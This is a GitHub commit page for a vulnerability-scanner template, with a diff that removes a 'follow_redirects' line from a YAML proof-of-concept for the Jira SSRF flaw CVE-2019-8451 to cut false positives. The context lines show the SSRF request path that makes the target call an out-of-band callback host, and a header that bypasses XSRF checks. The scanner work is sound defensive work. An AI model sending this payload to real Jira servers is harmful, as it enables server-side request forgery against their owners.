Skip to content

Commit 8b0a9d7

Browse files
authored
修复某些特殊场景下误报 (#815)
1 parent 4442d3a commit 8b0a9d7

File tree

1 file changed

+0
-1
lines changed

1 file changed

+0
-1
lines changed

pocs/jira-ssrf-cve-2019-8451.yml

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,6 @@ rules:
1111
/plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
1212
headers:
1313
X-Atlassian-Token: no-check
14-
follow_redirects: true
1514
expression: |
1615
reverse.wait(5)
1716
detail:

0 commit comments

Comments
 (0)